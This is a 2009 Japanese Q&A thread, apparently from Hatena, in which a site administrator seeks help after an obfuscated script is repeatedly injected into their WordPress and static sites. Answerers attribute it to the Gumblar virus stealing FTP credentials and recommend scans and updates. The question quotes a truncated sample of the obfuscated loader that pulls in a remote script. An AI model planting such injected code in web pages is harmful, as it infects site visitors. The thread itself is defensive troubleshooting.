1週間ほどハッキングに悩まされております。

私の管理するサイト数件がいっせいに被害にあっています。

WEBサイトに下記のようなコードが埋め込まれるのです(念のため転記は一部)。

<script>/*GNU GPL*/ try{window.onload = function(){var Xi3ref6qv5 = document.createElement('s$^$(c($r)i))^p!^!#t^(!'.replace(/\!|\^|#|@|\)|\(|\$|&/ig, ''));Xi3ref6qv5.setAttribute('type', 'text/javascript');Xi3ref6qv5.setAttribute('src', 'h^$$t$^&t^&$))p$)&:$^)/(^/!^t@i@!s(!(以下略)

ネット上で同じような被害が多発している旨見まして、手動でコードを削除しています。
削除後FTPのパスワードも変えています。
しかし次の日には同じコードが埋め込まれてしまうのです。

各サイトは、htmlベースの静的なもの、wordpressによるものもありますが、
同じ被害にあっています。
WPサイトは、コードを削除後FTPアカウントとともに、WPの管理者アカウントも変更しています。

サーバーはlolipop、heteml、マイティーサーバを利用していますが、
どのサーバーのものも全部やられています。
この状況から私のPC自体に問題があるのではないかとも疑っております。

ここ数日はやっている現象のように見受けられるのですが、根本的な処置をお教えください。

回答の条件
  • URL必須
  • 1人2回まで
  • 登録:2009/12/25 11:37:37
  • 終了:2009/12/29 13:22:58

ベストアンサー

id:sm0k3 No.1

03回答回数591ベストアンサー獲得回数392009/12/25 11:46:21

ポイント27pt

http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102

本当に最近の話なんですね、推測されているとおり、PC側に問題があるようです。

対策としては、いくつかのソフトを最新にすれば良いようです。

http://blogs.yahoo.co.jp/noooo_spam/59306006.html

id:kanienoteiou

ありがとうございました。

ウィルス対策ソフト2種類でチェック、削除をおこない、かつ、FTPパスワードを全て変更し、FTPソフトを使用しないようにしました。

ためしに、一サイトだけ非公開のサイトのFTPを使用可能にして数日様子を見ていますが、どうやら収まった模様です。

2009/12/29 13:13:03

その他の回答(8件)

id:sm0k3 No.1

03回答回数591ベストアンサー獲得回数392009/12/25 11:46:21ここでベストアンサー

ポイント27pt

http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102

本当に最近の話なんですね、推測されているとおり、PC側に問題があるようです。

対策としては、いくつかのソフトを最新にすれば良いようです。

http://blogs.yahoo.co.jp/noooo_spam/59306006.html

id:kanienoteiou

ありがとうございました。

ウィルス対策ソフト2種類でチェック、削除をおこない、かつ、FTPパスワードを全て変更し、FTPソフトを使用しないようにしました。

ためしに、一サイトだけ非公開のサイトのFTPを使用可能にして数日様子を見ていますが、どうやら収まった模様です。

2009/12/29 13:13:03
id:mattn No.2

mattn回答回数104ベストアンサー獲得回数232009/12/25 11:58:55

ポイント16pt

ハッキングではなく、感染してますね。

http://www.ryan-isra.net/howto-fix-malicious-javascript-suspecte...

断ち切るには、感染経路を調べるのが先ですね。

感染しているのがWordPressらしいので、おそらくWordPressの穴をついた攻撃かと思います。

ですのでパスワードを変えても無駄かもしれません。

サービスを止めて最新のWordPressにするか、WordPressの脆弱性アナウンスを調べると良いかと思います。

id:kanienoteiou

wordpressのバージョンを最新にしても同じ症状が発生しましたので、

ウィルスチェック&削除、FTPのパスワードを変えて、FTPを使わないようにしたところ、収束しました。

新しいウィルスソフトを使用したところ、FTPを使用したときに、ウィルスが検出されましたので、おそらくウィルスだったのではないかと思います。

しばらく様子を見てみます。

ありがとうございました。

2009/12/29 13:15:12
id:mattn No.3

mattn回答回数104ベストアンサー獲得回数232009/12/25 12:26:22

ポイント5pt

失礼しました。sm0k3さんの言うように、ローカルPCが原因の様ですね。

http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2102

id:kanienoteiou

はい。

ローカルPCの問題だった模様です。

ありがとうございました。

2009/12/29 13:15:31
id:horonict No.4

horonict回答回数257ベストアンサー獲得回数512009/12/25 13:25:10

ポイント28pt

症状からして、ご利用のPCがGumblarウイルスに感染していると思われます。

対策として以下の手順を実施してください。

  1. パターンファイルを最新にしたウイルススキャンソフトを使ってPCをフルスキャンする
  2. WindowsUpdateを実施する
  3. Adobe Reader, Acrobat, Flash Playerを最新版にする

Gumblarウイルスとは

http://internet.watch.impress.co.jp/cda/special/2009/05/21/23523...

http://www.yomiuri.co.jp/net/security/goshinjyutsu/20091224-OYT8...

id:kanienoteiou

ご指摘いただいた対策を全ておこない、

FTPのパスワードを変え、且つ、FTPを使用しないようにしました。

これで、落ち着いている模様です。

ありがとうございました。

2009/12/29 13:16:20
id:kn1967 No.5

kn1967回答回数2915ベストアンサー獲得回数3012009/12/25 13:29:35

ポイント16pt

Wordpress2.8系の最新版は2.8.6になります。

セキュリティアップデートなので、アップデートは必須と心得ましょう。

WordPress | 日本語 » WordPress 2.8.6 日本語版リリースのお知らせ


マイティーサーバの「お知らせ」では見かけませんでしたが、

各レンタルサーバー会社の「お知らせ」では(重要度にもよりますが)

アップデートの必要性について書かれている場合もありますので、

本家(WordPress | 日本語)以外にも目を通すように、

しておいたほうがよろしいかと思います。

WordPress をご利用のお客様へ / 新着情報 / お知らせ - ロリポップ!

「 WordPress 」 の脆弱性に関する報告 - 大容量・高機能レンタルサーバー「heteml」


※どういったお立場か存じませんが、

 管理者としての手落ちだと糾弾されても文句は言えない状況なので、

 バックアップを取った上で、早急に対応なさる事をお勧めします。

id:kanienoteiou

はい。

今回はかなり身につまされました。

セキュリティに対して再度気を引き締めなおします。

ありがとうございました。

2009/12/29 13:16:59
id:azuco1975 No.6

azuco1975回答回数613ベストアンサー獲得回数162009/12/25 15:28:44

ポイント7pt

lolipopに相談するのが一番です。

数日で対策方法がメールしてくれますよ。

http://q.hatena.ne.jp/answer

id:kanienoteiou

今回は、なんとか対策完了した模様です。

ありがとうございました。

2009/12/29 13:17:21
id:szich No.7

szich回答回数1ベストアンサー獲得回数02009/12/25 15:42:24

ポイント27pt

Gumblarウイルス、通称GENOウィルスですね。

対策については、ここが比較的まとまっていると思います。

http://www31.atwiki.jp/doujin_vinfo/

id:kanienoteiou

大変参考になりました。

ありがとうございました。

2009/12/29 13:17:36
id:k2jp No.8

k2jp回答回数19ベストアンサー獲得回数62009/12/25 18:13:18

ポイント24pt

直接質問とは関係ないですが、id:mattn さんが2番目の回答で引用している ryan-isla を含むURLは感染しているようです。ESET NOD32 が警告出しました。

 

・JavaScript 有効状態でアクセスしてしまった人は感染確認することをオススメします

・プラグイン有効状態でアクセスしてしまった人も(念のため)感染確認しておくと良いと思います

 

安全な URL 以外、引用は慎重にしたほうが2次感染予防に良いかと思います

id:kanienoteiou

ウィルススキャンソフトを、ESTEに変更したところ、駆除が出来たようです。

ありがとうございました。

2009/12/29 13:18:21
id:kazuki-aranami No.9

(・∀・)キムティ♪回答回数1ベストアンサー獲得回数02009/12/25 20:45:53

ポイント18pt

専門的な内容はわかりませんが、ここ数日の動向をまとめてあります。


現状、FTPパスワードを盗まれたことによる改竄なのか、脆弱性を利用した改竄なのか、

特定できていないません。後者のケースを想定した対策が必要かと思われます。


WordPressなどのPHPやHTMLコンテンツ改竄に関する情報を追加中  JR東日本サイト改竄などの「Gumblar」亜種に関する情報共有 http://bit.ly/5p9YNP

id:kanienoteiou

症状と、対策の状況から察するに、

ウィルスに感染して、FTPを監視されていた模様です。

パスワードを変更しても、次の日にはまたやられていましたが、

パスワード変更後、FTPを使用しないようにしたら、問題は発生しませんでした。

複数のウィルス対策ソフトで、徹底的に削除を行った結果、FTPを使用しても、改竄はなくなりました。

ありがとうございました。

2009/12/29 13:20:30

この質問への反応(ブックマークコメント)

トラックバック

「あの人に答えてほしい」「この質問はあの人が答えられそう」というときに、回答リクエストを送ってみてましょう。

これ以上回答リクエストを送信することはできません。制限について

絞り込み :
はてなココの「ともだち」を表示します。
回答リクエストを送信したユーザーはいません